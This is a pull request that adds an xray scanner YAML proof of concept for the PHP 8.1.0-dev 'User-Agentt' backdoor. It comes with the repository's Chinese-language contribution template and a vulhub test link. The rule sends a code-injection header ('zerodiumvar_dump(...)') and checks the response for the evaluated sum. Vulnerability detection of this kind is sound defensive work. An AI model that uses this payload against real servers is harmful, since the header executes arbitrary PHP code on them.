### PR TITLE
poc-yaml-php8.1backdoor.yaml

### DIFF
--- a/pocs/poc-yaml-php8.1backdoor.yaml
+++ b/pocs/poc-yaml-php8.1backdoor.yaml
@@ -1,0 +1,16 @@
+name: poc-yaml-php8.1backdoor
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+rules:
+  - method: GET
+    path: /
+    headers:
+      User-Agentt: zerodiumvar_dump({{r1}} + {{r2}});
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1+r2)))
+detail:
+  author: m0tky(https://github.com/m0tky)
+  links:
+    - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor


### PR DESCRIPTION
# 本 poc 是检测什么漏洞的
本poc测试 PHP 8.1.0-dev 开发版本后门
测试环境
使用vulhub的docker环境
https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md#php-810-dev-%E5%BC%80%E5%8F%91%E7%89%88%E6%9C%AC%E5%90%8E%E9%97%A8%E4%BA%8B%E4%BB%B6
备注

**请先认真阅读下列要求，如不符合会被直接关闭 PR**

- 确保当前 POC 与已有的 POC 没有重复，除了仓库 `pocs` 目录中的，还有内置的几个用 Go 写的 POC也不要重复：
  ```
  poc-go-php-cve-2019-11043-rce
  poc-go-seeyon-htmlofficeservlet-rce
  poc-go-tongda-lfi-upload-rce
  poc-go-tongda-arbitrary-auth
  poc-go-ecology-dbconfig-info-leak
  poc-go-tomcat-put
  poc-go-tomcat-cve-2020-1938
  ```
  
- 阅读规范和要求 
  - https://chaitin.github.io/xray/#/guide/contribute
  - https://chaitin.github.io/xray/#/guide/high_quality_poc

- 一个 pull request 只提交一个 poc

- 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交，可以私聊群管理员

 - 不接受没有测试环境的 poc，测试环境可以使用 [vulhub](https://github.com/vulhub/vulhub/) 或 [vulnapps](https://github.com/Medicean/VulApps)，也可以提供 fofa/zoomeye/shodan 等搜索关键字。 请勿直接填写公网上未修复的站点的地址，如果有特殊情况，请私聊群内管理解决。
 
- 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励，请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信，说明你的 poc 地址，方便发送奖励。

**我是分割线，在提交 poc 填写说明的时候，请务必阅读上方要求，然后删除本分割线和上方的内容，只保留下面自定义的部分即可，否则不予通过。**

----------

## 本 poc 是检测什么漏洞的
PHP 8.1.0-dev User-Agentt Backdoor
## 测试环境
测试环境使用vulhub自带
https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
## 备注
![image](https://user-images.githubusercontent.com/43568769/115138471-f738d900-a05e-11eb-8402-d700b43ba97d.png)
